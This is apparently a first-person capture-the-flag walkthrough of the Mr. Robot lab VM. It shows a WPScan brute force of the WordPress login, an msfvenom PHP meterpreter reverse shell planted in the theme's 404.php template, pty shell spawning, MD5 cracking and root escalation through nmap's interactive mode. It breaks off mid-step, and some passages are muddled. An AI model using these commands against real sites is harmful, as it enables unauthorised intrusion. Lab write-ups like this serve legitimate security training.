Mr. Robot CTF Walkthrough
To initially start this, I use netdiscover to find what the IP address of the Vm. Once I found the IP address I then use nmap to scan the open ports and services.
After the scan completes it shows the port 22, port 80 and port 443 are so I try seeing what the browser will tell us.
The webpage is very well made. We are greeted with a “Hello friend” message. Next I use Nikto. Nikto is a web server assessment tool. It is designed to find various default and insecure files, configurations and programs on any type of web server. https://cirt.net/nikto2-docs/introduction.html
Nikto –h 192.168.83.160
With the name called Mr. Robot, and also with the result in Nikto, I search the robots.txt file in the web browser.
Once opened, we see a text and dictornary file. I use wget to save the file to my PC then open to see what the results.
As we can see we have our first flag!
Now its time to see what the fsocity.dic has in store for us.
Once opened, I see a very long list of words making it to be a wordlist of some sort. As I look through more nikto results, I notice a wp-login page. Know this is a word press site, I visit the url and prompted with a admin login page
At first for just start, I try the default user name and password admin:admin and get negative results. I did notice at the Error for invalid username. After thinking that the CTF is called Mr. Robot, I try the main character first name, Elliot. I then get results of in correct password for the user name Elliot.
I triedmany different passwords to try to get into the webpage, no luck. Next step I go for is bruteforcing the login with WPscan.
Wpscan –url http://192.168.83.160 –wordlist /YOUR DIRCERTORY/fsocity.dic –username Elliot
After 5 hours and 17 minutes according to the Elapsed time, I finally get the password I need to login.
Now im login and have access. Now time to make a shell to gain access further.
I make a code using msfvenom with the following commands:
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.83.139 lport=4444 -f raw
Copy the code from <?php to die(); and paste it on template(and save it)
Once uploaded in the PhP. I open metasploitto start a session.
set payload php/meterpreter/reverse_tcp
set lhost 192.168.83.139
set lport 4444
Now after a visit to http://192.168.0.102/wp-content/themes/twentyfifteen/404.php i get a meterpreter session. To obian the shell type
echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
This now gives you access.
Using ls –las command gives access about the user information.
cd /home take you to the home folder
cd/robot takes you to the robot folder
Once I use the ls command I see the clue for the 2nd flag. So I cat the txt file.
I was able to ls what is inside the txt file. So I move on to the next file listed
Once completed I have another clue for the flag2. It’s a md5 hash. So next I need to crack the hash.
The value will translate to abcdefghijklmnopqrstuvwxyz
Next I get super user rights to robot
Using the translate I got from the md5 hash I have access.
I do another
Then cat the the key txt file
Now I have the 2nd flag
Next I use nmap interactive shell to get the 3rd and final flag.
Nmap supported an option called “interactive.” With this option, users were able to execute shell commands by using a nmap “shell” (interactive shell).
With the above commands you will enter nmap then type :
id (to know the users)
cd /root (lets you to enter root)
Once you have enetered the root, type :